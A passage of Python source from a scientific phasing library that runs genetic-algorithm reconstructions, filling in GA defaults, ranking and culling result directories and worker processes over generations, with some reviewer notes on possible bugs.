    elif pkg == 'np':
        dvclib = importlib.import_module('cohere.lib.nplib').nplib
    calc.set_lib(dvclib, pkg == 'af')
def set_ga_defaults(pars):
    """Fill in defaults for every GA-related setting missing from *pars*.

    Per-generation list settings (metrics, thresholds, sigmas, breed modes)
    are normalized to length ``ga_generations``: a single entry is replicated,
    a short list is padded with the setting's default, a long list is kept.

    Parameters
    ----------
    pars : dict
        reconstruction configuration; mutated in place. Must contain
        'algorithm_sequence'.

    Returns
    -------
    dict or str
        the updated *pars*, or — kept for backward compatibility with
        existing callers — an error string when the configured cullings
        would remove every reconstruction.
    """
    def _per_generation(values, filler, n_gen):
        # Normalize a per-generation list: replicate a single entry, pad a
        # short list with filler, keep a long one as-is.
        if len(values) == 1:
            return values * n_gen
        if len(values) < n_gen:
            return values + [filler] * (n_gen - len(values))
        return values

    pars.setdefault('reconstructions', 1)
    pars.setdefault('ga_generations', 1)
    n_gen = pars['ga_generations']

    # check if pc feature is on; clamp its start generation into valid range
    if 'pc' in pars['algorithm_sequence'] and 'pc_interval' in pars:
        if 'ga_gen_pc_start' not in pars:
            pars['ga_gen_pc_start'] = 0
        pars['ga_gen_pc_start'] = min(pars['ga_gen_pc_start'], n_gen - 1)

    pars.setdefault('ga_fast', False)

    if 'ga_metrics' not in pars:
        pars['ga_metrics'] = ['chi'] * n_gen
    else:
        pars['ga_metrics'] = _per_generation(pars['ga_metrics'], 'chi', n_gen)

    # cullings follow a different rule: no single-entry replication, only padding
    if 'ga_cullings' in pars:
        worst_remove_no = pars['ga_cullings']
        if len(worst_remove_no) < n_gen:
            worst_remove_no = worst_remove_no + [0] * (n_gen - len(worst_remove_no))
    else:
        worst_remove_no = [0] * n_gen
    pars['worst_remove_no'] = worst_remove_no

    # calculate how many reconstructions should continue after each generation
    ga_reconstructions = []
    reconstructions = pars['reconstructions']
    for culling in worst_remove_no:
        reconstructions = reconstructions - culling
        if reconstructions <= 0:
            return 'culled down to 0 reconstructions, check configuration'
        ga_reconstructions.append(reconstructions)
    pars['ga_reconstructions'] = ga_reconstructions

    shrink_wrap_threshold = pars.get('shrink_wrap_threshold', .1)
    if 'ga_shrink_wrap_thresholds' in pars:
        pars['ga_shrink_wrap_thresholds'] = _per_generation(
            pars['ga_shrink_wrap_thresholds'], shrink_wrap_threshold, n_gen)
    else:
        pars['ga_shrink_wrap_thresholds'] = [shrink_wrap_threshold] * n_gen

    shrink_wrap_gauss_sigma = pars.get('shrink_wrap_gauss_sigma', .1)
    if 'ga_shrink_wrap_gauss_sigmas' in pars:
        # previous version inconsistently re-read pars[...] for the length
        # check while padding a local copy; the helper uses one list throughout
        pars['ga_shrink_wrap_gauss_sigmas'] = _per_generation(
            pars['ga_shrink_wrap_gauss_sigmas'], shrink_wrap_gauss_sigma, n_gen)
    else:
        pars['ga_shrink_wrap_gauss_sigmas'] = [shrink_wrap_gauss_sigma] * n_gen

    if 'ga_breed_modes' not in pars:
        pars['ga_breed_modes'] = ['sqrt_ab'] * n_gen
    else:
        pars['ga_breed_modes'] = _per_generation(pars['ga_breed_modes'], 'sqrt_ab', n_gen)

    # low-resolution (lowpass-filtered) generations are driven by the sigmas list
    if 'ga_lowpass_filter_sigmas' in pars:
        pars['low_resolution_generations'] = len(pars['ga_lowpass_filter_sigmas'])
    else:
        pars['low_resolution_generations'] = 0
    if pars['low_resolution_generations'] > 0:
        pars.setdefault('low_resolution_alg', 'GAUSS')
    return pars
def order_dirs(tmp, dirs, evals, prev_dir_seq, metric):
    """Rank one generation's result directories by metric value and rename
    them on disk so the directory name reflects the rank (best result in '0').

    Parameters
    ----------
    tmp : list
        per-reconstruction ranking history; a (rank, eval) tuple is appended
        for each reconstruction this generation
    dirs : list
        directories where the reconstruction results files are saved
    evals : list
        metric value computed for each directory in dirs, in the same order
    prev_dir_seq : list
        NOTE(review): accepted but never read in this function — confirm it
        can be dropped or whether it was meant to drive the tmp bookkeeping
    metric : str
        metric type of this generation; for 'summed_phase' and 'area' larger
        is better, for all other metrics smaller is better

    Returns
    -------
    tmp : list
        the updated ranking history
    """
    # ranks keeps indexes of reconstructions from best to worst
    # for most of the metric types the minimum of the metric is best, but for
    # 'summed_phase' and 'area' it is opposite, so reversing the order
    ranks = np.argsort(evals).tolist()
    if metric == 'summed_phase' or metric == 'area':
        ranks.reverse()
    # NOTE(review): this iterates the rank VALUES and uses them to index
    # ranks again (ranks[i]); it looks like range(len(ranks)) may have been
    # intended — verify against the consumer of tmp before changing
    for i in ranks:
        tmp[ranks[i]].append((i, evals[ranks[i]]))
    # all the generation directories are in the same parent directory
    parent_dir = os.path.abspath(os.path.join(dirs[0], os.pardir))
    rank_dirs = []
    # append "_<rank>" to each result directory name; the two-step rename
    # avoids collisions between old numeric names and new rank names
    for i in range(len(ranks)):
        dest = os.path.join(parent_dir, str(i) + '_' + str(ranks[i]))
        shutil.move(dirs[i], dest)
        rank_dirs.append(dest)
    # remove the number preceding rank from each directory name, so the directories are numbered
    # according to rank
    for dir in rank_dirs:
        last_sub = os.path.basename(dir)
        dest = os.path.join(parent_dir, last_sub.split('_')[-1])
        shutil.move(dir, dest)
    return tmp
def order_processes(proc_metrics, metric_type):
    """Rank worker processes from best to worst by their reconstruction metric.

    Parameters
    ----------
    proc_metrics : dict
        maps process id -> metric value computed for that process' result
    metric_type : str
        metric used this generation; for 'summed_phase' and 'area' a larger
        value is better, for all other metrics a smaller value is better

    Returns
    -------
    list
        (pid, metric) tuples ordered best first
    """
    # sort ascending by metric value first ...
    by_value = sorted(proc_metrics.items(), key=lambda item: item[1])
    # ... then flip for the metrics where larger means better (kept as a
    # separate reverse, matching the established tie ordering)
    if metric_type in ('summed_phase', 'area'):
        by_value.reverse()
    return by_value
def cull(lst, no_left):
    """Trim *lst* to at most *no_left* leading entries (the best ones, since
    callers pass lists ordered best first).

    Returns the original list object untouched when it is already short
    enough, otherwise a new list holding the first *no_left* entries.
    """
    if len(lst) > no_left:
        return lst[:no_left]
    return lst
def reconstruction(lib, conf_file, datafile, dir, devices):
    """
    This function controls reconstruction utilizing genetic algorithm.

    Parameters
    ----------
    lib : str
        library acronym to use for reconstruction. Supported:
        np - to use numpy
        cp - to use cupy
        af - to use arrayfire
        cpu, opencl, or cuda - to use specified library of arrayfire
    conf_file : str
        configuration file with reconstruction parameters
    datafile : str
        name of the file containing data
    dir : str
        a parent directory that holds the generations. It can be experiment directory or scan directory.
    devices : list
        list of GPUs available for this reconstructions
    Returns
    -------
    nothing
    """
    pars = ut.read_config(conf_file)
    # NOTE(review): set_ga_defaults returns an error string when culling would
    # remove every reconstruction; that case is not checked here
    pars = set_ga_defaults(pars)
    if 'save_dir' in pars:
        save_dir = pars['save_dir']
    else:
        filename = conf_file.split('/')[-1]
        save_dir = os.path.join(dir, filename.replace('config_rec', 'results_phasing'))
    generations = pars['ga_generations']
    if 'reconstructions' in pars:
        reconstructions = pars['reconstructions']
    else:
        reconstructions = 1
    # GA needs a population; a single reconstruction cannot breed
    if reconstructions < 2:
        print ("GA not implemented for a single reconstruction")
        return
    # the cupy does not run correctly with multiprocessing, but limiting number of runs to available devices will work as temporary fix
    if pars['ga_fast']: # the number of processes is the same as available GPUs (can be same GPU if can fit more recs)
        if lib == 'af' or lib == 'cpu' or lib == 'opencl' or lib == 'cuda':
            # the data is loaded here only to learn its dimensionality, which
            # selects the arrayfire lib flavor in set_lib
            if datafile.endswith('tif') or datafile.endswith('tiff'):
                try:
                    data = ut.read_tif(datafile)
                except:
                    print('could not load data file', datafile)
                    return
            elif datafile.endswith('npy'):
                try:
                    data = np.load(datafile)
                except:
                    print('could not load data file', datafile)
                    return
            else:
                print('no data file found')
                return
            set_lib('af', len(data.shape))
            if lib != 'af':
                dvclib.set_backend(lib)
        else:
            set_lib(lib)
        # one long-lived worker process per reconstruction, capped by devices
        reconstructions = min(reconstructions, len(devices))
        workers = [calc.Rec(pars, datafile) for _ in range(reconstructions)]
        processes = {}
        for worker in workers:
            worker_qin = Queue()
            worker_qout = Queue()
            process = Process(target=worker.fast_ga, args=(worker_qin, worker_qout))
            process.start()
            # map pid -> [command queue, result queue]; commands sent on qin
            # are 'init_dev', 'init', 'breed', 'iterate', 'get_metric',
            # 'save_res' and 'done', each acknowledged on qout
            processes[process.pid] = [worker_qin, worker_qout]
        prev_dirs = None
        for g in range(generations):
            print ('starting generation',g)
            if g == 0:
                # first generation only: hand a device to each worker
                for pid in processes:
                    worker_qin = processes[pid][0]
                    worker_qin.put(('init_dev', devices.pop()))
                bad_processes = []
                for pid in processes:
                    worker_qout = processes[pid][1]
                    ret = worker_qout.get()
                    # negative return means device initialization failed
                    if ret < 0:
                        worker_qin = processes[pid][0]
                        worker_qin.put('done')
                        bad_processes.append(pid)
                # remove bad processes from dict (in the future we may reuse them)
                for pid in bad_processes:
                    processes.pop(pid)
            # (re)initialize each worker, seeding from the previous
            # generation's saved result directory when one exists
            for pid in processes:
                worker_qin = processes[pid][0]
                if prev_dirs is None:
                    prev_dir = None
                else:
                    prev_dir = prev_dirs[pid]
                worker_qin.put(('init', prev_dir, g))
            for pid in processes:
                worker_qout = processes[pid][1]
                ret = worker_qout.get()
            if g > 0:
                # breed the surviving population before iterating
                for pid in processes:
                    worker_qin = processes[pid][0]
                    worker_qin.put('breed')
                for pid in processes:
                    worker_qout = processes[pid][1]
                    ret = worker_qout.get()
            # run the phasing iterations for this generation
            for pid in processes:
                worker_qin = processes[pid][0]
                worker_qin.put('iterate')
            bad_processes = []
            for pid in processes:
                worker_qout = processes[pid][1]
                ret = worker_qout.get()
                # negative return means this worker's iterations failed
                if ret < 0:
                    worker_qin = processes[pid][0]
                    worker_qin.put('done')
                    bad_processes.append(pid)
            # remove bad processes from dict (in the future we may reuse them)
            for pid in bad_processes:
                processes.pop(pid)
            # get metric, i.e the goodness of reconstruction from each run
            proc_metrics = {}
            metric_type = pars['ga_metrics'][g]
            for pid in processes:
                worker_qin = processes[pid][0]
                worker_qin.put(('get_metric', metric_type))
            for pid in processes:
                worker_qout = processes[pid][1]
                metric = worker_qout.get()
                proc_metrics[pid] = metric
            # order processes by metric
            proc_ranks = order_processes(proc_metrics, metric_type)
            # cull
            culled_proc_ranks = cull(proc_ranks, pars['ga_reconstructions'][g])
            # remove culled processes from list (in the future we may reuse them)
            for i in range(len(culled_proc_ranks), len(proc_ranks)):
                pid = proc_ranks[i][0]
                worker_qin = processes[pid][0]
                worker_qin.put('done')
                processes.pop(pid)
            # save results, we may modify it later to save only some
            gen_save_dir = os.path.join(save_dir, 'g_' + str(g))
            prev_dirs = {}
            for i in range(len(culled_proc_ranks)):
                pid = culled_proc_ranks[i][0]
                worker_qin = processes[pid][0]
                worker_qin.put(('save_res', os.path.join(gen_save_dir, str(i))))
                prev_dirs[pid] = os.path.join(gen_save_dir, str(i))
            for pid in processes:
                worker_qout = processes[pid][1]
                ret = worker_qout.get()
            # every worker failed or was culled: nothing left to evolve
            if len(processes) == 0:
                break
        # all generations finished: tell the surviving workers to exit
        for pid in processes:
            worker_qin = processes[pid][0]
            worker_qin.put('done')
    else: # not fast GA
        # tmp accumulates the ranking history later written to ranks.txt
        tmp = []
        rec = multi
        prev_dirs = []
        if 'init_guess' not in pars:
            pars['init_guess'] = 'random'
        if pars['init_guess'] == 'continue':
            # seed the population from results saved by a previous run
            continue_dir = pars['continue_dir']
            for sub in os.listdir(continue_dir):
                image, support, coh = ut.read_results(os.path.join(continue_dir, sub) + '/')
                if image is not None:
                    prev_dirs.append(os.path.join(continue_dir, sub))
                    tmp.append([os.path.join(continue_dir, sub)])
            if len(prev_dirs) < reconstructions:
                # top up the population with random starting points
                for i in range(reconstructions - len(prev_dirs)):
                    tmp.append(['random' + str(i)])
                prev_dirs = prev_dirs + (reconstructions - len(prev_dirs)) * [None]
        elif pars['init_guess'] == 'AI_guess':
            # one AI-initialized reconstruction plus random ones
            import cohere.controller.AI_guess as ai
            tmp.append(['AI_guess'])
            for i in range(reconstructions - 1):
                tmp.append(['random' + str(i)])
            ai_dir = ai.start_AI(pars, datafile, dir)
            if ai_dir is None:
                return
            prev_dirs = [ai_dir] + (reconstructions - 1) * [None]
        else:
            # all random starting points
            for i in range(reconstructions):
                prev_dirs.append(None)
                tmp.append(['random' + str(i)])
        q = Queue()
        for g in range(generations):
            print ('starting generation',g)
            gen_save_dir = os.path.join(save_dir, 'g_' + str(g))
            metric_type = pars['ga_metrics'][g]
            # run the whole generation in a child process; results come back
            # through the queue q
            p = Process(target=rec.multi_rec, args=(lib, gen_save_dir, devices, reconstructions, pars, datafile, prev_dirs, metric_type, g, q))
            p.start()
            p.join()
            temp_dirs, evals, prev_dir_seq = q.get()
            #ranks_file.write(str(evals)+'\n'+str(prev_dir_seq))
            # results are saved in a list of directories - save_dir
            # it will be ranked, and moved to temporary ranked directories
            tmp = order_dirs(tmp, temp_dirs, evals, prev_dir_seq, metric_type)
            prev_dirs = temp_dirs
            reconstructions = pars['ga_reconstructions'][g]
            prev_dirs = cull(prev_dirs, reconstructions)
            # the tmp hold the ranking info. print it to a file
            # NOTE(review): the handle is reopened ('w+' truncates) every
            # generation and never closed; only flush() persists it — consider
            # a with-block here
            rank_file = open(os.path.join(save_dir, 'ranks.txt'), 'w+')
            for l in tmp:
                rank_file.write(str(l) + '\n')
            rank_file.flush()
        print('done gen')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.